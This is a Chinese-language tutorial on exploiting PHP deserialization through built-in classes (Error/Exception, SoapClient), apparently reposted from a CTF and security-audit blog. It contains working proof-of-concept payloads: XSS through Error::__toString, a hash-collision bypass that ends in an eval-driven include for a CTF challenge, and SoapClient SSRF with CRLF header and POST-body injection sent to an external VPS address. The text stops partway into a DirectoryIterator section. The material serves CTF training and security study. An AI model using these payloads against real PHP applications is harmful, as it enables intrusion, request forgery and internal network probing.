深入认识PHP反序列化原生类

发布时间：2022-07-09 12:45:35 所属栏目：PHP教程来源：互联网

导读：浅析php反序列化原生类的利用如果在代码审计或者ctf中，有反序列化的功能点，但是却不能构造出完整的pop链，那这时我们应该如何破局呢？我们可以尝试一下从php原生类下手，php有些原生类中内置一些魔术方法，如果我们巧妙构造可控参数，触发并利用其内置魔

　　浅析php反序列化原生类的利用
　　如果在代码审计或者ctf中，有反序列化的功能点，但是却不能构造出完整的pop链，那这时我们应该如何破局呢？我们可以尝试一下从php原生类下手，php有些原生类中内置一些魔术方法，如果我们巧妙构造可控参数，触发并利用其内置魔术方法，就有可能达到一些我们想要的目的。

　　一、常见魔术方法

　　__wakeup() //执行unserialize()时，先会调用这个函数

　　__sleep() //执行serialize()时，先会调用这个函数

　　__destruct() //对象被销毁时触发

　　__call() //在对象上下文中调用不可访问的方法时触发

　　__callStatic() //在静态上下文中调用不可访问的方法时触发

　　__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法

　　__set() //用于将数据写入不可访问的属性

　　__isset() //在不可访问的属性上调用isset()或empty()触发

　　__unset() //在不可访问的属性上使用unset()时触发

　　__toString() //把对象当作字符串使用时触发

　　__invoke() //当尝试将对象调用为函数时触发

　　二、原生类中的魔术方法
　　我们采用下面脚本遍历一下所有原生类中的魔术方法

　　<?php$classes = get_declared_classes();foreach ($classes as $class) {

　　    $methods = get_class_methods($class);

　　    foreach ($methods as $method) {

　　        if (in_array($method, array(

　　            '__destruct',

　　            '__toString',

　　            '__wakeup',

　　            '__call',

　　            '__callStatic',

　　            '__get',

　　            '__set',

　　            '__isset',

　　            '__unset',

　　            '__invoke',

　　            '__set_state'

　　        ))) {

　　            print $class . '::' . $method . "n";

　　        }

　　    }}

　　三、一些常见原生类的利用
　　Error/Exception
　　Error 是所有PHP内部错误类的基类。 (PHP 7, 8)

　　**Error::__toString ** error 的字符串表达

　　返回 Error 的 string表达形式。

　　Exception是所有用户级异常的基类。 (PHP 5, 7, 8)

　　**Exception::__toString ** 将异常对象转换为字符串

　　返回转换为字符串（string）类型的异常。

　　类属性

　　message 错误消息内容

　　code 错误代码

　　file 抛出错误的文件名

　　line 抛出错误的行数

　　XSS
　　__toString方法会返回错误或异常的字符串形式，其中包含我们输入的参数，如果我们构造一串xss代码，结合echo渲染，将触发反射形xss漏洞

　　示例：

　　<?php$a = unserialize($_GET['a']);echo $a;

　　POC：

　　<?php$a = new Error("<script>alert('xss')</script>");$b = serialize($a);echo urlencode($b);

　　image-20220327114659883

　　hash绕过
　　先看一道题

　　[2020 极客大挑战]Greatphp

　　<?phperror_reporting(0);class SYCLOVER {

　　    public $syc;

　　    public $lover;

　　    public function __wakeup(){

　　        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){

　　           if(!preg_match("/<?php|(|)|"|'/", $this->syc, $match)){

　　               eval($this->syc);

　　           } else {

　　               die("Try Hard !!");

　　           }

　　

　　        }

　　    }}if (isset($_GET['great'])){

　　    unserialize($_GET['great']);} else {

　　    highlight_file(__FILE__);}

　　需要绕过两个hash强比较，且最终需要构造eval代码执行

　　显然正常方法是行不通的，而通过原生类可进行绕过

　　同样，当md5()和sha1()函数处理对象时，会自动调用__tostring方法

　　先简单看一下其输出

　　<?php$a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);

　　$d=new Exception("payload",4);

　　echo $a."<br>";

　　echo $b."<br>";

　　echo $c."<br>";

　　echo $d;

　　image-20220322205917541

　　可以发现，这两个原生类返回的信息除了行号一模一样，利用这点，我们可以尝试进行hash函数的绕过，需要注意的是，必须将两个传入的对象放到同一行

　　因此我们可以进行简单的测试,发现使用此方法可以绕过hash强(弱)函数比较

　　<?php$a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){

　　    echo '$a不等于$b'."n";}if (md5($a)===md5($b)){

　　    echo "md5值相等n";}if (sha1($a)===sha1($b)){

　　    echo "sha1值相等";}

　　image-20220324195852488

　　根据这些知识点，我们可以轻松构造payload

　　<?phpclass SYCLOVER {

　　  public $syc;

　　  public $lover;

　　  public function __wakeup(){

　　      if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){

　　         if(!preg_match("/<?php|(|)|"|'/", $this->syc, $match)){

　　             eval($this->syc);

　　         } else {

　　             die("Try Hard !!");

　　         }

　　

　　      }

　　  }}$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";//两次取反绕过正则$a=new Error($str,1);

　　  $b=new Error($str,2);

　　  $c = new SYCLOVER();$c->syc = $a;$c->lover = $b;

　　  echo(urlencode(serialize($c)));?>

　　SoapClient
　　SoapClient是一个专门用来访问web服务的类，可以提供一个基于SOAP协议访问Web服务的 PHP 客户端，可以创建soap数据报文，与wsdl接口进行交互

　　soap扩展模块默认关闭，使用时需手动开启

　　SoapClient::__call —调用 SOAP 函数 (PHP 5, 7, 8)

　　通常，SOAP 函数可以作为SoapClient对象的方法调用

　　SSRF
　　构造函数：

　　public SoapClient :: SoapClient(mixed $wsdl [，array $options ])

　　第一个参数是用来指明是否是wsdl模式，如果为`null`，那就是非wsdl模式。

　　第二个参数为一个数组，如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是要将请求发送到的SOAP服务器的URL，而uri 是SOAP服务的目标命名空间。

　　什么是soap

　　SOAP 是基于 XML 的简易协议，是用在分散或分布的环境中交换信息的简单的协议，可使应用程序在 HTTP 之上进行信息交换

　　SOAP是webService三要素（SOAP、WSDL、UDDI）之一：WSDL 用来描述如何访问具体的接口， UDDI用来管理，分发，查询webService ，SOAP（简单对象访问协议）是连接或Web服务或客户端和Web服务之间的接口。

　　其采用HTTP作为底层通讯协议，XML作为数据传送的格式。

　　我们构造一个利用payload，第一个参数为NULL，第二个参数的location设置为vps地址

　　<?php

　　$a = new SoapClient(null, array(

　　'location' => 'http://47.102.146.95:2333',

　　'uri' =>'uri',

　　'user_agent'=>'111111'));

　　$b = serialize($a);

　　echo $b;

　　$c = unserialize($b);

　　$c->a();

　　监听vps的2333端口，如下图所示成功触发SSRF，vps收到了请求信息

　　且可以看到SOAPAction和user_agent都可控

　　image-20220326202151356

　　本地测试时发现，当使用此内置类(即soap协议)请求存在服务的端口时，会立即报错，而去访问不存在服务(未占用)的端口时，会等待一段时间报错，可以以此进行内网资产的探测。

　　如果配合CRLF漏洞，还可以可通过 SoapClient 来控制其他参数或者post发送数据。例如:HTTP协议去攻击Redis

　　CRLF知识扩展

　　HTTP报文的结构：状态行和首部中的每行以CRLF结束，首部与主体之间由一空行分隔。

　　CRLF注入漏洞，是因为Web应用没有对用户输入做严格验证，导致攻击者可以输入一些恶意字符。

　　攻击者一旦向请求行或首部中的字段注入恶意的CRLF(rn)，就能注入一些首部字段或报文主体，并在响应中输出。

　　通过结合CRLF，我们利用SoapClient+CRLF便可以干更多的事情，例如插入自定义Cookie，

　　<?php$a = new SoapClient(null, array(

　　    'location' => 'http://47.102.146.95:2333',

　　    'uri' =>'uri',

　　    'user_agent'=>"111111rnCookie: PHPSESSION=dasdasd564d6as4d6a"));

　　    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

　　image-20220326204543138

　　发送POST的数据包，这里需要将Content-Type设置为application/x-www-form-urlencoded，我们可以通过添加两个rn来将原来的Content-Type挤下去，自定义一个新的Content-Type

　　<?php$a = new SoapClient(null, array(

　　    'location' => 'http://47.102.146.95:2333',

　　    'uri' =>'uri',

　　    'user_agent'=>"111111rnContent-Type: application/x-www-form-urlencodedrnX-Forwarded-For: 127.0.0.1rnCookie: PHPSESSID=3stu05dr969ogmprk28drnju93rnContent-Length: 10rnrnpostdata"));

　　    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

　　image-20220326205821109

　　看一道ctfshow上的题，完美利用上述知识点

　　$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);

　　array_pop($xff);

　　$ip = array_pop($xff); //获取xff头

　　

　　

　　if($ip!=='127.0.0.1'){

　　    die('error');

　　}else{

　　    $token = $_POST['token'];

　　    if($token=='ctfshow'){

　　        file_put_contents('flag.txt',$flag);

　　    }

　　}

　　poc：

　　<?php

　　$target = 'http://127.0.0.1/flag.php';

　　$post_string = 'token=ctfshow';

　　$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));

　　$a = serialize($b);

　　$a = str_replace('^^',"rn",$a);

　　echo urlencode($a);

　　?>

　　DirectoryIterator/FilesystemIterator
　　DirectoryIterator类提供了一个简单的接口来查看文件系统目录的内容。

　　DirectoryIterator::__toString 获取字符串形式的文件名（PHP 5,7,8）

（编辑：我爱故事小小网_铜陵站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!

php提前判断远程文件是	php include与require
KindEditor编辑器调用	php中的观察者模式简单